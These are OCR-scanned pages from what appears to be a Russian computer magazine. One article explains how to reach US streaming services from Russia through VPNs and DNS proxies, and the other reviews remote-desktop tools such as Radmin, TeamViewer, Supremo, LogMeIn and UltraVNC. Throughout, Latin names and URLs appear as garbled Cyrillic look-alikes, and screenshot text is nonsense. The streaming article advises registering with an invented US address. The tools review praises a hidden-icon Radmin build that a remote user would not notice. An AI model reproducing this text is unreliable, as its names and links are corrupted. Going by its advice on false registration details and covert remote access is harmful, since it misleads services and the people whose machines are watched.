робно, чтобы ты понимал, на каком контенте 
специализируется каждый из них и в чем особен- 
ность их работы. 
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ЕО 


Менйх 

Когда-то МейЙх занимался прокатом О\О, но успел вовремя трансформиро- 
вать свой бизнес. Сейчас в США ему принадлежит до 90% рынка видеосер- 
висов, работающих по подписке. Причина в огромном каталоге. Минус в том, 
что тут редко появляются совсем свежие серии. Выбор фильмов тоже нема- 
ленький, но сюда попадают в основном старые картины. Лучше, чем у какого- 
нибудь М.ги, но все равно не сравнится с любым оп аетапа сервисом вроде 
Пипе$ или Атагтоп па \Маео. 


Аа агт К 
Нов, 


И Биг % 
т 


И ТТ 


ря рб: неа. ан ЗЫ урн" рама Е р 


Ган асе аа сыр в зав сит Ван 


Ниши 

Еще один популярный видеосервис, занимающий оставшиеся десять про- 
центов рынка. В Ни сделали фокус на свежих сериях, и часто так получает- 
ся, что последний сезон какого-либо сериала или шоу доступен только здесь, 
а весь остальной архив — на Мейх. Поэтому многим логично использовать 
эти два сервиса в связке. Недостаток в том, что большая часть контента в Ни и 
доступна только в браузерной версии и даже подписчики не имеют возмож- 
ности посмотреть его на мобильном устройстве или ТВ-приставке. Также тут 
есть реклама — и для подписчиков тоже. 


Уаз Фе Гали Ерзоде 
це ! м4 во 


Видеосервисов меньше, чем музыкальных, но итут делоне ограничивается двумя названиями. Есть еще набирающий популярность Атагоп Рите, 
но он совместим с меньшим количеством устройств и требует годовой подписки. Профит скорее для тех, кто часто что-то покупает на Атагоп, так 
как вместе с подпиской на Рите даются льготные условия доставки товаров. 


Рап4ога 

Один из первых сервисов, предложивших автоматическую генерацию под- 
борки музыки для пользователей. Поскольку Рапдога начинал еще до бума 
социальных сетей, разработчики сделали ставку на очень продвинутый ал- 
горитм, способный выстраивать «родственные» связи между песнями и ис- 
полнителями по сотням параметров. На мой вкус, это работает намного 
лучше, чем сервисы, использующие для рекомендаций социальный граф. 
Минусы в том, что нельзя выбрать конкретную песню и нельзя пропускать 
больше определенного количества треков. Плюс втом, что Рапдога бесплатна 
как в браузере, так и на устройствах. 
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зи ПОНОС 


ЗронРу 

Рапаога — отличный инструмент для того, чтобы находить новую музыку. 
Сильная сторона ЗроШу — в том, как он позволяет слушать ту музыку, кото- 
рую ты уже знаешь и любишь. В этом смысле здесь мало ограничений, иауди- 
отека сервиса почти в 20 раз больше, чем у главного конкурента. Также если 
у Рапдога социальной составляющей почти нет, то в Зроу это одна из глав- 
ных фишек. Еще у сервиса есть очень неплохие приложения для десктопа 
и мобильных устройств. Подписчики (10 долларов в месяц) могут составлять 
плей-листы и скачивать их на смартфон для офлайн-прослушивания. 


Осы Созтефу [ма ОА», Мг. были! 


Ук нау” ев Без! сотефата & соед, №. Оле в 
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Музыкальных сервисов намного больше — ещеесть Ваш, Соод!е Р!ау Мис, а скоро появится и !Типе$ Ва4о. Кроме того, есть и сервисы, прекрас- 
но работающие в России (например, 2уооа, Веегег). Рапдога в данном случае интересна действительно хорошим алгоритмом составления плей- 
листов — оначасто подбирает неочевидные треки. 
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ТЕСТВ БРАУЗЕРЕ 

Шаг первый — попробовать все это дело в браузере. Это про- 
ще всего и не требует никаких финансовых вложений, а ты уже 
сможешь понять, нужно ли это тебе. 

Самый простой способ — поставить расширение Меда Ни 
(ПИо5://тедайтт.сот) для браузера. Поддерживаются Еиеох 
и Спготе. Для пользователей других браузеров есть отдельный 
рас-файл (те Чайи{.сот/аетаиН.рас), который прописывается 
в системных настройках или в браузере. После установки снова 
зайди на те файтт.сот для того, чтобы убедиться, что все ра- 
ботает так, как нужно. 


МЕТЕЫХ В КАРМАНЕ 

Для того чтобы попробовать поставить все это дело на мобиль- 
ные устройства, придется потрудиться. Естественно, на клиен- 
ты всех сервисов наложены географические ограничения. Про- 
ще всего в АпагоА — достаточно воспользоваться \РМ и зайти 
в Сооде Р!ау. Самый простой вариант — ТиппеВеаг (1иппефеаг. 
сот). В ЮЗ все сложнее — нужно создать американскую учетку, 
и, чтобы сделать это без привязки к американской банковской 
карточке, придется пойти на хитрость. 

Открой десктопный 'Типе$ и зайди в раздел приложений. 
Выйди из своей учетки и найди любое приложение, требующее 
американской учетки. При попытке установить его тебя пере- 
ключит на американский Арр Зоге, после чего ты сможешь за- 
вести новую учетку, не имеющую привязки к банковской карте. 
Дальше тебе нужно зайти в ПТипе$ на своем устройстве и уста- 
новить все нужные приложения. После этого можешь зайти 
обратно в свой обычный аккаунт. Каждый раз, когда будут вы- 
ходить обновления для установленных «в обход» приложений, 
тебе просто будут предлагать ввести пароль для соответствую- 
щей учетки, так что никакого дополнительного геморроя. 

Однако для того, чтобы приложения заработали, придет- 
ся еще помучиться. Тут есть два варианта — либо воспользо- 
ваться \/РМ с американским 1Р, либо подключить специальный 
ОМ$-сервис. Вариант с ОМ$ лучше в том смысле, что нет ника- 
ких ограничений по трафику. Минус в том, что его нужно про- 
писывать отдельно для каждой \М/-Е!-сети, а в мобильной сети 
этот трюк вообще не сработает. УРМ-сервисы вроде ТиппеВелг, 
Наетап (!етап.пе{) и Зро их (зроих.сот) намного проше 
в использовании, но стоят денег. Но поскольку основной юзкейс 
тут — просмотр сериалов на планшете дома или в гостинице, 
логичнее выбрать ОМЗ. 

Я пробовал три разных ОМ$-сервиса. Бесплатный Тип! 
(тип.пет) дает доступ к Ничи, но не Мейшх, а бесплатный 
ЧУпюосаюг (пИр$://ипюсатюг.сот) — наоборот. Впрочем, как 
я понимаю, у Утосаюг проблема с Нии лишь временная, так 
что, возможно, когда ты будешь читать эту статью, все зарабо- 
тает. Лучше всех себя показал сервис Чпо0М№$, но он обойдется 
в 5 долларов в месяц (то есть как УРМ). 

Итак, ты поигрался и решил, что тебе понравилось. Нужно 
платить. Тут возникает еще одна проблема — чаще всего карта 
российского банка к оплате не подойдет. Придется пойти на до- 
полнительное ухищрение и завести виртуальную карточку ОМ 


Лучшевсего 
в моем тесте 
сработал 
Арр!е ТУ 


Трюкс0№$, есте- 
ственно, не пройдет 
с мобильной сетью. Если 
хочешь слушать Рапдога 
в машине, тебе придется 
заранее запустить при- 
ложение в \!!-Н!-сети 
либо использовать \/РМ. 


Обрати внимание, что 
настройки субтитров 
в Арр!е ТУ нужно выстав- 
лять не в приложении, 
а для самой приставки. 
Иначе при каждом 
запуске фильма в Мех 
придется включать 
субтитры вручную. 


Типпе!Веаг — нуочень 
милый УРМ 


При желании можно 
настроить О№$ прямо 
на роутере — тогда не 
придется заниматься 
отдельной настройкой 
каждого устройства. 

Но такое явно не каждо- 
му понравится. 


На самом деле основной 
юзкейс для Нии и Мех 
на мобильном устрой- 
стве — возможность с 
удобством изучать ката- 
логи составлять список 
для просмотра, который 
тутже синхронизируется 
ствоей учеткой. Также 
есть целый класс при- 
ложений, предоставля- 
ющих универсальный 
поиск по всем сервисам. 
Например, Рап (Гап.1\) 
для 10$, Раууе (Таууе. 
сот) для 0$ и Апаго!а. 
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ГЕНм то То 


1 ммАТОЫ № 


Раууе — удобный каталог, позволяющий искать сериалы и фильмы 
сразу по всем площадкам 


(ПИ р$://л\за.амл.сот). После регистрации ты сможешь попол- 
нить счет со своей основной карты. Для регистрации в сервисах 
вводи данные, предоставленные ОМИ, а также любой реальный 
американский адрес. Это легко найти в Соое Мар$, можешь 
просто выбрать случайный Арре Зюге. 


БОЛЬШОЙ ЭКРАН 

Наконец, ты, вероятно, захочешь вывести картинку на теле- 
визор. Конечно, можно развернуть обычный НТРС и пользо- 
ваться браузерными версиями, но удобства в этом мало (как 
минимум — нельзя пользоваться пультом). Самое подходящее 
устройство, которое можно найти в России, — это Арр!еТУ. Сто- 
ит около 4500 рублей, совместимо с Нии и Мей. А главное — 
приставка позволяет выставлять произвольные ОМ$, что важно 
для наших целей. 

Процедура довольно стандартна. Сначала нужно выбрать 
ОМ$-сервис (смотри выше). Затем ввести его данные в Арр!е 
Т\ Единственное «но» — придется выйти из своего Арре 1. 
Лично у меня не удавалось войти даже под американской учет- 
кой. Следовательно, не будет работать Ноте Зпайпд из других 
Арре-устройств и нельзя будет использовать !РПопе в качестве 
пульта. 

Если есть возможность, можешь купить в Штатах пристав- 
ку Воки. Поддерживает все известные сервисы и имеет очень 
удобную функцию универсального поиска по всем контент-про- 
вайдерам, но, увы, ОМ$ в ней не выставить. Придется пропи- 
сывать прямо в роутере, а это не всем подходит. Также обрати 
внимание, что английские версии ВокКи отличаются прошивкой 
и с американскими сервисами несовместимы. Еще одна «все- 
ядная» альтернатива — Сооде Т\, который тоже придется вво- 
зить из Штатов. 

Ниц и Мех совместимы с ХБох 360 и Р!ауТайоп 3. Я тести- 
ровал все это дело на ХЗ60. Консоль определяет местоположе- 
ние пользователя как по 1Р, так и по адресу, указанному в ин- 
формации о карте. Поэтому, если у тебя привязана к аккаунту 
карта, придется немного схитрить: 

Введи в настройки консоли данные О№$. 

Создай новую учетную запись. 

Войди в нее и зайди в раздел приложений. 

Поставь Ниц и Мейх. 

Вернись в свою учетную запись, зайди в приложения и вве- 
ди данные учетных записей. 


= 


Вот и все. В моем случае, правда, Мех жаловался на низ- 
кую скорость и занижал разрешение так, что на экране станови- 
лись заметны артефакты. Кроме того, для Хбох 360 потребует- 
ся платный аккаунт Хбох Име Со| (около 240 рублей в месяц), 
но у пользователей Р$ЗЗ3З таких проблем нет. 

Мой опыт я считаю удачным. Я остановился на бесплатной 
Рапаога и подписке на Мех, получив таким образом доступ 
к очень неплохой коллекции контента в НО по цене базового 
пакета каналов у какого-нибудь «Билайна» (или любого другого 
провайдера). 2= 
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КАК ПРАВИЛЬНО 
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Средства удаленного 
доступа на все случаи жизни 
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Денис Колисниченко 
ЧИ$Наб$@дтай.сот 


Программ для организации удаленного доступа достаточно много. Есть платные и бесплатные 
программы, есть программы для разных операционных систем. Разумеется, в этой статье мы 

не сможем рассмотреть все сразу, но поговорим о самых интересных из них, а главное — пой- 
мем, что эффективнее для той или иной задачи. 


ВАОМИМ (5НАВЕМАНЯЕ) 
Лет десять назад самой популярной программой 
для удаленного доступа была Вааттт, она и сей- 
час есть (м/мим.гадтт.ги) — никуда не подева- 
лась за это время. С нее и начнем обзор. 

Программа состоит из двух частей: Зегуег 
и \Мемег. Первая запускается на удаленном 
компьютере (или удаленных компьютерах), 
а вторая — на твоем компьютере и использу- 
ется для подключения к удаленным машинам, 
которые ты собираешься настраивать. На сайте 
разработчиков можно скачать как полный ком- 
плект, так и отдельные компоненты. Также есть 
ропаЫе-версия \Мемег, работающая без уста- 
новки, и версия Ваатт Зегуег 3.5 МТ! — это спе- 
циальная версия без пиктограммы втрее, то есть 
пользователь удаленного компа и не узнает, 
что на нем установлена Ватт, пока ты не нач- 
нешь управлять его компьютером. 

Отмечу ключевые возможности: поддержка 
\ММпаом/$ 8 32/64 БИ, поддержка переключения 


В.) Настройки Радттит Зелиея 
ке) Ради быль 3.6 дла \Аебоии ВЗОРУ 2ОООААав ОООРХРУЗОКО | Аекиы зытубка | 
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ЦЕ 


сессий пользователей в \\Итаом/5 ХР//$а/7/8, 
совместимость с \\ЛМпе (Ватт может органи- 
зовать удаленный доступ к ПК под управлением 
Чпих через \М/Мте), поддержка Тепт, удаленное 
выключение ПК, сканер серверов Ваатт (по- 
зволяет найти все ПК, которыми ты можешь 
управлять в своей сети), передача файлов между 
бегуег и Мемег. 


Выводы: 

+ Функционал программы: здесь и собствен- 
ная аутентификация, и поддержка голосо- 
вого чата, и возможность передачи файлов. 
Все очень удобно. 

+ Благодаря тому что на удаленном компе 
установлен Зегуег, не нужно присутствие 
пользователя, как в других подобных про- 
граммах. Например, ты можешь админи- 
стрировать удаленные ПК своих коллег, 
когда те ушли на обед. В других подобных 
программах необходимо или чтобы пользо- 


Й: 7 Баттл Мнение 


овАныЕёНиЕ Раекыы Вид Сераме Справка 


а ЕЕ" Г 


ватель разрешил соединение, или же чтобы 
пользователь предоставил тебе пароль, ко- 
торый генерируется автоматически при каж- 
дом сеансе связи. 

Низкие системные требования, программа 
совсем не грузит процессор, что особо ак- 
туально для моего старого ноута с процем 
отАМО, который греется как утюг, — они вы- 
ступал в роли «удаленного» компа. 

Просто запустить Зегуег недостаточно, нуж- 
но его еще и настраивать. 

Многие пользователи любят Теат\емег 
не за его функциональность, а за то, 
что он не требует каких-либо особых пор- 
тов (по умолчанию он использует 80-й 
порт) и не требует настройки брандмауэра. 
Ваатт Зегуег использует порт 4899, и запу- 
стить его без настройки брандмауэра не по- 
лучится. 

Нет мобильных клиентов. 

Не поддерживает другие ОС. 


Рис. 3. Брандмау- 
эр заблокировал 
попытку подклю- 


Пете дне Беетеыт \ и 
5 = чения 
Презени врет — 
лата 
Справа 
Пуюавиищевли 
[9:13 клал пруфериеы Суза Делныынй а а а а ой ава 
сле и ГАЕК. Белы ны И мм ТГ 
Е ГлаДет иолсиырснаеть пгт Нылеьсег 

Юомпонвыть ыонула РОблиаг О 9 Пыытрый Знбеко. 135-20? Вов права 
заоришеныи. ® ТУНННИ? РитабесН Суирон не пишенорнаре. Воже праве зишищниныя Быка 


Рис. 1. Окно настройки Ваатит $егуег Рис. 2. Ваатт Мемег 
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ТЕАМ\М!Е\МЕВ (ЕВЕЕРМ/АНЕ) 
Сейчас, наверное, из программ для удаленного 
доступа популярнее всех Теат\Ле\мег. Ты можешь 
скачать ее полную версию и при этом не запла- 
тить ни копейки. Для некоммерческого использо- 
вания программа бесплатна. 

Также есть ропаШе-версия программы 
для \\пао\$, что очень полезно для нечастого 
использования программы, причем роЧае- 
версию можно запускать как на «сервере», так 
и на «клиенте», в отличие от Ваатт, где можно 
запустить только клиент (Ме\мег) без установки, 
а «серверную» часть нужно обязательно устанав- 
ливать. 

После запуска программы ты увидишь основ- 
ное окно Теап\емег и окно «Компьютеры и кон- 
такты» (рис. 4). Если ты планируешь помогать 
сразу всем своим родственникам и коллегам, 
можешь нажать кнопку «Зарегистрироваться», 
создать аккаунт, и тогда в этом окне ты будешь ви- 
деть все многочисленные компы, которые ты на- 
страивал. 

Теперь разберемся, что есть что. Если нужно 
подключиться к твоему компу, то удаленной сто- 
роне ты должен сообщить свой ТО (в данном слу- 
чае 969 930 547) и пароль (8229). Как сообщить, 
уже решай сам — можно скопировать и передать 
эти значения по скайпу, аське, по электронке, 
$М5$ или просто продиктовать по телефону. Этот 
пароль меняется при каждом запуске програм- 
мы. Если программа установлена на твоем ком- 
пе, можно сделать постоянный личный пароль, 
но я не рекомендую: пароль может быть ском- 
прометирован и тогда кто угодно сможет подклю- 
читься к твоему компу. 

Если нужно подключиться к удаленному ком- 
пу, то тебе нужно ввести 0 удаленной стороны 
(в данном случае 411108007) и нажать кнопку 
«Подключиться к партнеру», после чего програм- 


ВОУАЁТ$ (ЗНАНЕМАНЕ) 

Когда-то была такая программулина — тВетое. 
Не знаю, что там произошло, но проект тНетое 
был закрыт, а разработчики взяли и создали 
другой проект — Воуа! Т$ (м/мим.гоуаЙ$.сот/ 
пашт/поте.азрх). На сайте ты найдешь вер- 
сии для \ЛМтпао\м/5, О$ Х и Ю$ (можно запускать 
с!РПопе и Рад). 

В Воуа! ТЗ перед созданием подключения 
нужно создать документ, то есть одно подключе- 
ние = один документ. Документы Воуа! Т$ весьма 
удобная штука, их можно передавать как обычные 
файлы, например другому админу. Он сможет от- 
крыть такой документ и сразу подключиться к уда- 
ленному компу без необходимости создавать 
соединение вручную. У $Пагемаге-версии есть 
ограничение на число одновременно открытых 
документов — десять. Как по мне, то этого вполне 
достаточно для некоммерческого использования 
программы, поэтому на практике ты даже не за- 
метишь, что тебе чего-то не хватает (если, конеч- 
но, ты не администрируешь удаленно огромную 
сеть компов). 

Программа кардинально отличается 
от Ваатт и Теат\Ме\мег. Обе программы соче- 
тают в себе функциональность как сервера, так 
и клиента. Другими словами, на одном из ком- 
пьютеров ты можешь установить Ватт Зегуег 
или Теат\Ле\мег, а на другом использовать ВНадтт 
\Лемиег или Теат\е\ммег соответственно для под- 
ключения к этому удаленному компу. Так вот, Воуа! 
Т$ — это что-то наподобие Раатт Мемег, то есть 
программа для подключения к удаленному сер- 
веру, но вот сервер придется создавать своими 


Как правильно подступиться 
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Рис. 4. Теат\Ме\мег запущен 


ма попросит ввести пароль, который ты получил 
от удаленной стороны. Вот и все — в появившем- 
ся окне можно производить настройку удаленно- 
го компа (рис. 5). 

Наверное, ты уже заметил основное отличие 
от Наатт: нужно передать пароль тому, кто на- 
страивает комп, а в Вайтт пароль указывается 
при создании учетки пользователя. Другими сло- 
вами, нужно присутствие пользователя за ком- 
пом. Чтобы решить проблему, нужно организо- 
вать автозапуск Теат\Лемег (например, добавить 
в группу «Автозагрузка» или прописать в реестре 
в ключе Вип) и задать «Личный пароль». Обрати 
внимание, что задать личный пароль нельзя, если 
программа не установлена на компе, а запущена 
без установки. 

Есть еще одна программа, о которой ты дол- 
жен знать: Теат\Леммег Ноз. Она запускается 
как системная служба и используется для кру- 
глосуточного доступа к удаленному компу, вклю- 
чая вход в систему / выход из нее. Для установки 
Теат\Лемег Но${ нужны права администратора, 
которые не всегда есть, поэтому все равно в боль- 
шинстве случаев будешь пользоваться обычным 
Теат\Ле\мег. 


силами. Как ты это сделаешь — твои проблемы. 
Воуа! Т$ не поможет тебе создать такой сервер, 
а только даст подключиться к нему. 

Воуа! Т$ поддерживает протоколы ВОР Тете, 
$$Н, Сцих, УМС. Серверы придется настраивать 
самостоятельно. Пусть у нас есть Ипих (Убити 
или ее клон) и нужно настроить ММС-сервер. 
Для этого сначала установим УМС-сервер: 


5идо арф-веф 1п5а11 упс45егуег 


Первый раз запускаем без параметров: 


5<иао упс4зегуег 


Нужно ввести пароль, который будет исполь- 
зоваться для подключения к серверу. Сам пароль 
будет сохранен в $НОМЕ/.упс/ра$$ма. Теперь 
нужно запустить упс4зегуег, указав номер экрана: 


<и4о упс4зегуег :3 


Далее в Аоуа! Т$ нужно создать новый доку- 
мент (на вкладке Е!е), далее перейти на вкладку 
ЕСН и нажать кнопку УМС. В появившемся окне 
нужно ввести имя дисплея (О!зр!ау Мате) — в на- 
шем случае :3, 1Р-адрес УММС-сервера и указать 
номер порта (обычно 5900). Пароль будет запро- 
шен при подключении к серверу. 


Выводы: 

+ Универсальный клиент для подключения 
по различным протоколам. 

+ Есть версии для \М/тдом/$, ОЗ Хи 105$. 


45 


Рис. 5. Теат\Ме\мег в действии 


Если на компьютере А запущен Теат\Ле\мег (не 
Но${), то к нему могут подключиться компы Б, В, Г 
(число три приведено для примера) для совмест- 
ного администрирования. Другое дело, что нужно 
согласовывать действия администраторов, по- 
скольку клавиатура и мышь общие, но один может 
настраивать, остальные будут наблюдать. 

Как и Раатт, Теат\е\мег позволяет обме- 
ниваться файлами, голосовыми и текстовыми 
сообщениями, а также удаленно перезагружать 
компьютер. 


Выводы: 

Простота. 

Не требует установки. 

Не требует настройки брандмауэра. 

Наличие версий для других ОС. 

Наличие клиентов для Апагога, 0$ и \\/Р8 

Возможность организации интерактивных 

конференций (до 25 участников). 

+ Не требует прав администратора для уда- 
ленного доступа. 

= Грузит процессор заметно больше, чем 
Ваатт. 

= Мобильные клиенты не очень удобны. 


+++ + 


- Невозможно организовать удаленный до- 
ступ только средствами Воуа! Т$, нужны до- 
полнительные программы. 

= Требует дополнительной настройки серверов. 
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Рис. 6. Воуа!Т$ для \МИт4о\м$ 
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Рис. 7. Параметры подключения к\УМС 


$УРВЕМО (ЕРЕЕ\М/АНЕ) 

Давай проанализируем ситуацию. Если тебе 
не нравится Теат\емег или ты не можешь его 
использовать по некоторым причинам (в том 
числе и из-за необходимости покупать лицензию 
для коммерческого использования), а Вадтт 
тоже не подходит по каким-либо причинам, 
то придется искать аналоги. 

Одним из аналогов является программа 
Зиргето, которую можно скачать с сайта \м\мими. 
зиргетойее.сот/Лпаех.азрх. 

Программа (рис. 8) создана «по образу и по- 
добию» Теат\Лемег. Она не требует установки, 
принцип работы как у Теат\Лемег, даже терми- 
нологию она использует ту же (это я про 10 пар- 
тнера и другие надписи в интерфейсе). 

Настраиваемый компьютер и компьютер 
специалиста поддержки должны работать под 


м 
ето Вето{е Ое5Кюр Вейа - 2.0.0.13 = 


Файл Инструменты Язык Помощь 


(№) сиргето 


Учетные данные 
Ваш ТО 982 727 577 | Нажмите "Старт" для разрешения удаленного 
управления 
ыы — на поаключение 


Ваш партнер Соединения 


0 партнера 


Ш | Соединиться ю 
Для соединения с партнером укажите его 1 и нажмите 
"Соединиться” 
ГАЕе $иргето? Е 


Неф из у Ше нап$!аНоп$ 


Рис. 8. Программа Зиргето 


ГОСМЕПМ (ЕРЕЕР\МААЕ) 
Рассмотрим еще одну полезную программу — 
[одМеш (рис. 11). Назначение этой программы 
такое же, как и у всех остальных, рассмотрен- 
ных в этой статье, — удаленный доступ. На сай- 
те юатет.сот ты найдешь несколько подобных 
продуктов, нас же в первую очередь интересует 
продукт 1о9Мешт РГгее. Ее возможностей впол- 
не достаточно для большинства целей: доступ 
к компу под управлением \\МИпао\м/$ или ОЗ Х, уда- 
ленное управление и просмотр рабочего стола, 
копирование и вставка данных между компью- 
терами, функция перезагрузки, чат, поддержка 
нескольких мониторов, обнаружение вторжения 
по протоколу ЭЗЕ/ТЕ$, не требует настройки па- 
раметров брандмауэра, не требует прав админи- 
стратора удаленного компа. 

Лично мне понравились функции копирования 
и вставки данных между компьютерами, а также 
функция перезагрузки: в процессе настройки 
компьютера иногда требуется его перезагрузка, 


3 АТР  Рнь ныыимнынаы 1 адкраеавыы 
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ны Добро пожаловать в БооМет 
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С Опротранеко 


о Брривлиг оНаивья БРА Гы го ний В БЕЙ оефеорый бы ь рый ргобущи Рерши НВ 
м 


Сярыть 


Рис. 11. Основное окно одМет 


управлением только \\ЛЛпдо\$. Поддерживаются 
разные выпуски \\Ипаом/$, в том числе \МИпаом/$ 7 
и ММпаом/$ Зегуег 2008 В2. О поддержке \\МИп9о\м$ 
8 и ММпаомз Зегуег 2012 на официальном сайте 
пока ничего не сказано. 

Алгоритм использования прост: нужно запу- 
стить программу на обоих компьютерах, затем 
запросить у удаленной стороны ее 1 и пароль, 
после чего нажать «Соединиться». Перед этим 
удаленная сторона должна нажать «Старт», ина- 
че соединение не будет разрешено. Пожалуй, 
это единственное отличие от Теат\Ме\мег. 

Чтобы обзор был более полным, зайдем в на- 
стройки программы (Инструменты -» Опции). 
В разделе «Безопасность» (рис. 9) можно на- 
строить автозапуск программы, указать пароль 
для удаленных подключений и указать, какие 0 
могут подключаться к твоему компу. 


Безопасность 


Соединение 


[Г] Автоматически запускать биргето при старте \\МИпдом!з 


Пароль 


Подтвердите пароль 


Разрешенные к подключению ТО 


Любой 


Рис. 9. Параметры безопасности Зиргето 


после которой будет автоматически восстановлен 
сеанс удаленного доступа, что очень удобно. 

Способ работы с этой программой немного 
отличается от Теат\Ле\мег и подобных программ. 
В основном окне выбери «с Мас или ПК» и затем 
увидишь последовательность действий, кото- 
рую нужно выполнить, чтобы предоставить дру- 
гому пользователю доступ к этому компу (рис. 
12). Без регистрации на 1юдтет.сот не обой- 
тись, она хоть и бесплатная, но совершенно 
лишняя. 

Есть, правда, способ проще — анонимный 
доступ через браузер. Суть в следующем: поль- 
зователь, который хочет, чтобы ты настроил его 
комп, создает ссылку-приглашение, затем пере- 
дает ее любым удобным способом тебе (по етай, 
по скайпу и так далее). Ссылка-приглашение дей- 
ствительна определенное время (время назнача- 
ет удаленный пользователь), даже если ссылку 
кто-то подсмотрит, он вряд ли сможет ей восполь- 
зоваться после истечения срока годности. 


Я т АЕ 
ыы 
ры Доступ к этому компьютеру с ближайшего 

ая компьютера Мас илн ПК 


а Пр ры гра ее ер р Ты 
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Сарыть 


Рис. 12. Какподключиться к этому ПК 
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В разделе «Соединение» (рис. 10) можно ука- 
зать параметры прокси-сервера, если он при- 
сутствует в твоей сети. 

Кроме своего прямого назначения, а именно 
удаленного управления компьютером, програм- 
ма может использоваться для обмена файлами. 
Для обмена файлами (который возможен в двух 
направлениях — как скачивание, так и закачка) 
просто используй агад & агор. 


Выводы: 

Проста в использовании, не требует установки. 
Возможность передачи файлов. 
Возможность чата. 

Не требует настройки брандмауэра (исполь- 
зуется НТТР$/$$... 

= Нет поддержки других ОС, кроме \МИпаом5. 

= Нет мобильных клиентов. 


++++ 


Безопасность 


Соединение Настройки прокси 
©) Нет прокси 
(_) Автоматически определить настройки прокси 


(_) Ввести настройки вручную 


Рис. 10. Параметры соединения Зиргето 


Давай рассмотрим, как создать приглаше- 
ние и как его использовать. В разделе «Общий 
доступ к рабочему столу» выводятся текущие 
приглашения. Нажав кнопку «Отправить при- 
глашение», ты можешь сгенерировать ту самую 
ссылку. Мастер создания приглашения позволя- 
ет определить длительность приглашения и спо- 
соб отправки приглашения (можно отправить 
по электронной почте ссылку или получить ссылку 
и отправить ее вручную). Потом эту ссылку нужно 
отправить гостю. Когда он скопирует ее в браузер 
и откроет, то увидит экран приглашения. Гость мо- 
жет или полностью управлять компьютером, или 
только просматривать рабочий стол. 


Выводы: 

Не требует прав администратора. 

Не требует настройки брандмауэра. 
Удаленный доступ через браузер. 
Мобильные клиенты. 

= Несколько необычный принцип работы. 


+++ + 


Добео пожаловать на страницу понетициения гостевых 
пользователей Боны 


Бравый Бы. ырвввшы ыы 


ЕН РН НЕЕ - РТ бы НЕА, ВЕНЕ ры 


Рис. 13. Удаленное управление через браузер 
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ЧЕТВАУМС/ВЕАТУМС (ЕРЕЕМАНЕ) 

УМС (Мйиа! Меммо Сотрийпа) — система 
удаленного доступа к рабочему столу компью- 
тера, использующая протокол НЕВ (Ветае 
ЕгатеВиНег). В \\ММпаом$ сервер можно поднять 
в Уйга\мС ( ) или ВеаММС ( ). 
Программы похожи, поэтому рассмотрим только 
Ийга\умсС. 

При установке можно установить как \ММС- 
сервер, так и клиент. На твой компьютер, если 
к нему не нужен удаленный доступ, \/МС-сервер 
можно не устанавливать. При установке сервера 
можно настроить его для запуска в виде систем- 
ной службы, но для этого нужны права админа. 
Протокол ВЕВ, который использует УМС, обычно 
подразумевает использование портов 5900- 
5906. Следовательно, для соединения по УМС 
нужно настраивать брандмауэр, иначе он «заре- 
жет» соединение. 

Для подключения к УМС-серверу использует- 
ся программа УйгаУМС \Ме\мег. Программа уни- 
версальна, и ты можешь использовать ее для под- 
ключения к любому \МС-серверу, а не только 
к тому, на котором запущен ЧУйгаММС Зегуег. 
Аналогично к серверу, созданному программой 
ИйгауМС Фегуег, можно подключиться програм- 
мой АВоуаТ$ или любым другим \МС-клиентом. 

Пару слов о том, как это все работает. Сна- 
чала запускаем программу Уй!га\МС Еай Зе{йта$ 
и на вкладке Зеситу задаем пароль для доступа 
к \МС-серверу, затем нужно запустить програм- 
му Ийга\УМС Зегуег. После на другом компьютере 
запускаем УйгаУМС \Ме\мег (рис. 14) и вводим ПР 


АММУУАОМИМ (ЕВЕЕМАНЕ) 

Аттуу Адти ( ) — еще одна 
программа для удаленного доступа к рабочему 
столу. Программа хороша тем, что она абсолютно 
бесплатна, совсем нетребовательна к ресурсам 
(исполнимый файл вообще занимает смешные 
700 Кб), позволяет организовать как обычный 
удаленный доступ к рабочему столу, так и со- 
единение в стиле удаленного офиса, не требует 
установки и изменения параметров брандмау- 
эра. С остальными возможностями программы 
ты сможешь ознакомиться на сайте разработчи- 
КОВ. 
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© АИТО {до зеесЕ Без зе го) 
ЩТВА — (>2МЫУ) - Ехрептеть 
КАН {> 1МЫ&) - Мах Союг 
МЕСММ (128 - 2565$) - 256 Союз 
МООБЕМ — (19 -128КЫШ) - 64 Соки: 
Я0м — (< 1905) - 8 Союгс 
МАМЦА. (Це орбопе Библ 


Мег Оу АЛЛО Зайти 


[Бозе дерау ог Роз: рог) 


Сопйлт Ех 


Це ОБМРИО" = № Рыдт еее д... 


Ргсжу Нерезфег 


1. 1366 х.768 @ 0,0 -324и-60Н2__ 


а | 


Заме соплесвог зе гноя в5 дефзий [Се ве замед эе1гоз :в] 


Рис. 14. ЧИга\МС Мемгег 


компа, на котором установлен \УМС-сервер, и на- 
жимаем кнопку Соппес{. 


Выводы: 

- Нужны права админа, нужно настраивать 
брандмауэр. 

+ Один и тот же протокол можно использовать 
для управления М/пао\мз, О$ Х и Ипих, но это 
преимущества не конкретной программы, 
а самой \МС. 


АМУ\М/НЕВЕТ$ (ЕРЕР\МАНЕ) 

Апумпегет$ ( ) позво- 
ляет конвертировать компы в тонкие клиенты. 
Основное назначение этой программы отнюдь 
не удаленный доступ из соображений техниче- 
ской поддержки, как во всех ранее описанных 
программах, хотя ее тоже можно использовать 
для этого. Апумиагет$ позволяет дать вторую 
жизнь старым компам, которые будут использо- 
ваться как тонкие клиенты — подключаться к сер- 
веру, и уже на нем будут выполняться программы, 
которые физически невозможно запустить на ста- 
рых ПК. 


й Г  бвокьы 0 
УДАЛЕННЫЙ ДОСТУП В\ИМОО\/$ 8 Свойства системы 
На «сервере» (то есть на компе, к которо- И И ее 


му планируется удаленный доступ) нужно 

выполнить следующие действия: 

. Запусти ЗучетРгорейеНВетще.ехе. 

. Включи флажок «Разрешить подклю- 
чения удаленного помощника к этому 


СЯ 


У бвланньай пекин: 


Расусанивить подислревньяя ураленного поваскиныюв и эту 
к ОВАГЛЬИ- тер 


‚Допсльнтельно 


удаленный рабомнй стоп 


компьютеру». 


Вуабунрьтии гызомаеиюныя. #1 Зыиоал роет, Ба Барыня 


. Включи переключатель «Разрешить позилоченые 


удаленные подключения к этому ком- 


На разре нь роагерееньна РЕЯ ДРоиоиречнм в) РОРЯу «окт, 


№ Разовыить удаленных ПоделЕРеНАЙ К УРОН: КОРЛЬКУЛЬРУ 


ъН-ДОСТУП 


Классикой удаленного доступа остается 
З$ЗН. Казалось бы, что тут можно еще 
придумать? Ну например, что делать, 
если у тебя много удаленных машин? 
Прописывать алиасы для каждой? Есть 
специальные утилиты, позволяющие бы- 
